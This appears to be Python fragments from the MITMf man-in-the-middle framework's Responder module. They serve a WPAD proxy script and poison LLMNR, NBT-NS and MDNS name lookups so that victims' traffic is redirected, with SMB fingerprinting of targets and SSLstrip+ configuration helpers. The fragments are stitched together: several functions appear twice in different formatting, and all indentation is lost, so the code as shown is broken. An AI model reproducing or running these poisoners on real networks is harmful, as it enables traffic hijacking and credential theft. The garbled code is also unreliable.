def WpadCustom(data,client):
WPAD_Script = ConfigWatcher.getInstance().getConfig()["Responder"]['WPADScript']
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
if Wpad:
buffer1 = WPADScript(Payload=WPAD_Script)
buffer1.calculate()
return str(buffer1)
else:
return False
def WpadCustom(data, client):
WPAD_Script = ConfigWatcher.getInstance().getConfig(
)["Responder"]['WPADScript']
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
if Wpad:
buffer1 = WPADScript(Payload=WPAD_Script)
buffer1.calculate()
return str(buffer1)
else:
return False
def wpad(wpad_req):
if (wpad_req == 'wpad.dat') or (wpad_req.endswith('.pac')):
payload = ConfigWatcher.getInstance().config['Responder']['WPADScript']
resp = flask.Response(payload)
resp.headers['Server'] = "Microsoft-IIS/6.0"
resp.headers['Content-Type'] = "application/x-ns-proxy-autoconfig"
resp.headers['X-Powered-By'] = "ASP.NET"
resp.headers['Content-Length'] = len(payload)
return resp
def handle(self):
ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder']
RespondTo = ResponderConfig['RespondTo']
MADDR = "224.0.0.251"
MPORT = 5353
data, soc = self.request
if self.client_address[0] == "127.0.0.1":
pass
try:
if args.analyze:
if Parse_IPV6_Addr(data):
mitmf_logger.info(
'[MDNSPoisoner] {} is looking for: {}'.format(
self.client_address[0], Parse_MDNS_Name(data)))
if RespondToSpecificHost(RespondTo):
if args.analyze == False:
if RespondToIPScope(RespondTo, self.client_address[0]):
if Parse_IPV6_Addr(data):
mitmf_logger.info(
'[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'
.format(self.client_address[0],
Parse_MDNS_Name(data)))
Name = Poisoned_MDNS_Name(data)
MDns = MDNSAns(AnswerName=Name)
MDns.calculate()
soc.sendto(str(MDns), (MADDR, MPORT))
if args.analyze == False and RespondToSpecificHost(
RespondTo) == False:
if Parse_IPV6_Addr(data):
mitmf_logger.info(
'[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'
.format(self.client_address[0], Parse_MDNS_Name(data)))
Name = Poisoned_MDNS_Name(data)
MDns = MDNSAns(AnswerName=Name)
MDns.calculate()
soc.sendto(str(MDns), (MADDR, MPORT))
else:
pass
except Exception:
raise
def handle(self):
ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder']
RespondTo = ResponderConfig['RespondTo']
MADDR = "224.0.0.251"
MPORT = 5353
data, soc = self.request
if self.client_address[0] == "127.0.0.1":
pass
try:
if args.analyze:
if Parse_IPV6_Addr(data):
mitmf_logger.info('[MDNSPoisoner] {} is looking for: {}'.format(self.client_address[0],Parse_MDNS_Name(data)))
if RespondToSpecificHost(RespondTo):
if args.analyze == False:
if RespondToIPScope(RespondTo, self.client_address[0]):
if Parse_IPV6_Addr(data):
mitmf_logger.info('[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0],Parse_MDNS_Name(data)))
Name = Poisoned_MDNS_Name(data)
MDns = MDNSAns(AnswerName = Name)
MDns.calculate()
soc.sendto(str(MDns),(MADDR,MPORT))
if args.analyze == False and RespondToSpecificHost(RespondTo) == False:
if Parse_IPV6_Addr(data):
mitmf_logger.info('[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0],Parse_MDNS_Name(data)))
Name = Poisoned_MDNS_Name(data)
MDns = MDNSAns(AnswerName = Name)
MDns.calculate()
soc.sendto(str(MDns),(MADDR,MPORT))
else:
pass
except Exception:
raise
def handle(self):
ResponderConfig = ConfigWatcher().config['Responder']
DontRespondTo = ResponderConfig['DontRespondTo']
DontRespondToName = ResponderConfig['DontRespondToName']
RespondTo = ResponderConfig['RespondTo']
RespondToName = ResponderConfig['RespondToName']
data, soc = self.request
try:
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data)
if args.analyze:
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0], 445))
log.warning(
"{} is looking for: {} | OS: {} | Client Version: {}"
.format(self.client_address[0], Name,
Finger[0], Finger[1]))
except Exception:
log.warning("{} is looking for: {}".format(
self.client_address[0], Name))
else:
log.warning("{} is looking for: {}".format(
self.client_address[0], Name))
if DontRespondToSpecificHost(DontRespondTo):
if RespondToIPScope(DontRespondTo,
self.client_address[0]):
return None
if DontRespondToSpecificName(
DontRespondToName) and DontRespondToNameScope(
DontRespondToName.upper(), Name.upper()):
return None
if RespondToSpecificHost(RespondTo):
if args.analyze == False:
if RespondToIPScope(RespondTo,
self.client_address[0]):
if RespondToSpecificName(
RespondToName) == False:
buff = LLMNRAns(Tid=data[0:2],
QuestionName=Name,
AnswerName=Name)
buff.calculate()
for x in range(1):
soc.sendto(str(buff),
self.client_address)
log.warning(
"Poisoned answer sent to {} the requested name was: {}"
.format(self.client_address[0],
Name))
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0],
445))
log.info(
'OS: {} | ClientVersion: {}'
.format(
Finger[0], Finger[1]))
except Exception:
log.info(
'Fingerprint failed for host: {}'
.format(self.
client_address[0]))
pass
if RespondToSpecificName(
RespondToName) and RespondToNameScope(
RespondToName.upper(),
Name.upper()):
buff = LLMNRAns(Tid=data[0:2],
QuestionName=Name,
AnswerName=Name)
buff.calculate()
for x in range(1):
soc.sendto(str(buff),
self.client_address)
log.warning(
"[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}"
.format(self.client_address[0],
Name))
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0],
445))
log.info(
'OS: {} | ClientVersion: {}'
.format(
Finger[0], Finger[1]))
except Exception:
log.info(
'Fingerprint failed for host: {}'
.format(self.
client_address[0]))
pass
if args.analyze == False and RespondToSpecificHost(
RespondTo) == False:
if RespondToSpecificName(
RespondToName) and RespondToNameScope(
RespondToName.upper(), Name.upper()):
buff = LLMNRAns(Tid=data[0:2],
QuestionName=Name,
AnswerName=Name)
buff.calculate()
for x in range(1):
soc.sendto(str(buff), self.client_address)
log.warning(
"Poisoned answer sent to {} the requested name was: {}"
.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0], 445))
log.info(
'OS: {} | ClientVersion: {}'.format(
Finger[0], Finger[1]))
except Exception:
log.info('Fingerprint failed for host: {}'.
format(self.client_address[0]))
pass
if RespondToSpecificName(RespondToName) == False:
buff = LLMNRAns(Tid=data[0:2],
QuestionName=Name,
AnswerName=Name)
buff.calculate()
for x in range(1):
soc.sendto(str(buff), self.client_address)
log.warning(
"Poisoned answer sent to {} the requested name was: {}"
.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0], 445))
log.info(
'OS: {} | ClientVersion: {}'.format(
Finger[0], Finger[1]))
except Exception:
log.info('Fingerprint failed for host: {}'.
format(self.client_address[0]))
pass
else:
pass
else:
pass
except:
raise
def getResolverPort(self):
return int(ConfigWatcher().config['MITMf']['DNS']['port'])
def updateHstsConfig(self):
for k, v in ConfigWatcher().config['SSLstrip+'].iteritems():
self.sustitucion[k] = v
self.real[v] = k
def handle(self):
ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder']
DontRespondTo = ResponderConfig['DontRespondTo']
DontRespondToName = ResponderConfig['DontRespondToName']
RespondTo = ResponderConfig['RespondTo']
RespondToName = ResponderConfig['RespondToName']
data, socket = self.request
Name = Decode_Name(data[13:45])
if DontRespondToSpecificHost(DontRespondTo):
if RespondToIPScope(DontRespondTo, self.client_address[0]):
return None
if DontRespondToSpecificName(
DontRespondToName) and DontRespondToNameScope(
DontRespondToName.upper(), Name.upper()):
return None
if args.analyze:
if data[2:4] == "\x01\x10":
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0], 445))
mitmf_logger.warning(
"[NBTNSPoisoner] {} is looking for: {} | Service requested: {} | OS: {} | Client Version: {}"
.format(self.client_address[0], Name,
NBT_NS_Role(data[43:46]), Finger[0],
Finger[1]))
except Exception:
mitmf_logger.warning(
"[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}"
.format(self.client_address[0], Name,
NBT_NS_Role(data[43:46])))
else:
mitmf_logger.warning(
"[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}"
.format(self.client_address[0], Name,
NBT_NS_Role(data[43:46])))
if RespondToSpecificHost(RespondTo) and args.analyze == False:
if RespondToIPScope(RespondTo, self.client_address[0]):
if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data, args.wredir):
if RespondToSpecificName(RespondToName) == False:
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
mitmf_logger.warning(
'[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'
.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0], 445))
mitmf_logger.info(
"[NBTNSPoisoner] OS: {} | ClientVersion: {}"
.format(Finger[0], Finger[1]))
except Exception:
mitmf_logger.info(
'[NBTNSPoisoner] Fingerprint failed for host: %s'
% (self.client_address[0]))
pass
if RespondToSpecificName(
RespondToName) and RespondToNameScope(
RespondToName.upper(), Name.upper()):
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
mitmf_logger.warning(
'[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'
.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0], 445))
mitmf_logger.info(
"[NBTNSPoisoner] OS: {} | ClientVersion: {}"
.format(Finger[0], Finger[1]))
except Exception:
mitmf_logger.info(
'[NBTNSPoisoner] Fingerprint failed for host: %s'
% (self.client_address[0]))
pass
else:
pass
else:
pass
else:
if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,
args.wredir) and args.analyze == False:
if RespondToSpecificName(
RespondToName) and RespondToNameScope(
RespondToName.upper(), Name.upper()):
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
mitmf_logger.warning(
'[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'
.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0], 445))
mitmf_logger.info(
"[NBTNSPoisoner] OS: {} | ClientVersion: {}"
.format(Finger[0], Finger[1]))
except Exception:
mitmf_logger.info(
'[NBTNSPoisoner] Fingerprint failed for host: %s'
% (self.client_address[0]))
pass
if RespondToSpecificName(RespondToName) == False:
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
mitmf_logger.warning(
'[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'
.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger(
(self.client_address[0], 445))
mitmf_logger.info(
"[NBTNSPoisoner] OS: {} | ClientVersion: {}"
.format(Finger[0], Finger[1]))
except Exception:
mitmf_logger.info(
'[NBTNSPoisoner] Fingerprint failed for host: %s'
% (self.client_address[0]))
pass
else:
pass
def getResolverPort(self):
return int(
ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port'])
def getResolverPort(self):
return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port'])
def updateHstsConfig(self):
for k,v in ConfigWatcher.getInstance().config['SSLstrip+'].iteritems():
self.sustitucion[k] = v
self.real[v] = k
def handle(self):
ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder']
DontRespondTo = ResponderConfig['DontRespondTo']
DontRespondToName = ResponderConfig['DontRespondToName']
RespondTo = ResponderConfig['RespondTo']
RespondToName = ResponderConfig['RespondToName']
data, socket = self.request
Name = Decode_Name(data[13:45])
if DontRespondToSpecificHost(DontRespondTo):
if RespondToIPScope(DontRespondTo, self.client_address[0]):
return None
if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
return None
if args.analyze:
if data[2:4] == "\x01\x10":
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested: {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1]))
except Exception:
mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}".format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
else:
mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}".format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
if RespondToSpecificHost(RespondTo) and args.analyze == False:
if RespondToIPScope(RespondTo, self.client_address[0]):
if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,args.wredir):
if RespondToSpecificName(RespondToName) == False:
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1]))
except Exception:
mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0]))
pass
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1]))
except Exception:
mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0]))
pass
else:
pass
else:
pass
else:
if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,args.wredir) and args.analyze == False:
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1]))
except Exception:
mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0]))
pass
if RespondToSpecificName(RespondToName) == False:
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1]))
except Exception:
mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0]))
pass
else:
pass
def handle(self):
ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder']
DontRespondTo = ResponderConfig['DontRespondTo']
DontRespondToName = ResponderConfig['DontRespondToName']
RespondTo = ResponderConfig['RespondTo']
RespondToName = ResponderConfig['RespondToName']
data, soc = self.request
try:
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data)
if args.analyze:
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1]))
except Exception:
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {}".format(self.client_address[0], Name))
else:
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {}".format(self.client_address[0], Name))
if DontRespondToSpecificHost(DontRespondTo):
if RespondToIPScope(DontRespondTo, self.client_address[0]):
return None
if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
return None
if RespondToSpecificHost(RespondTo):
if args.analyze == False:
if RespondToIPScope(RespondTo, self.client_address[0]):
if RespondToSpecificName(RespondToName) == False:
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
for x in range(1):
soc.sendto(str(buff), self.client_address)
mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0],Name))
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1]))
except Exception:
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
pass
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
for x in range(1):
soc.sendto(str(buff), self.client_address)
mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0],Name))
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1]))
except Exception:
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
pass
if args.analyze == False and RespondToSpecificHost(RespondTo) == False:
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
for x in range(1):
soc.sendto(str(buff), self.client_address)
mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1]))
except Exception:
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
pass
if RespondToSpecificName(RespondToName) == False:
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
for x in range(1):
soc.sendto(str(buff), self.client_address)
mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0], Name))
if args.finger:
try:
Finger = RunSmbFinger((self.client_address[0],445))
mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1]))
except Exception:
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
pass
else:
pass
else:
pass
except:
raise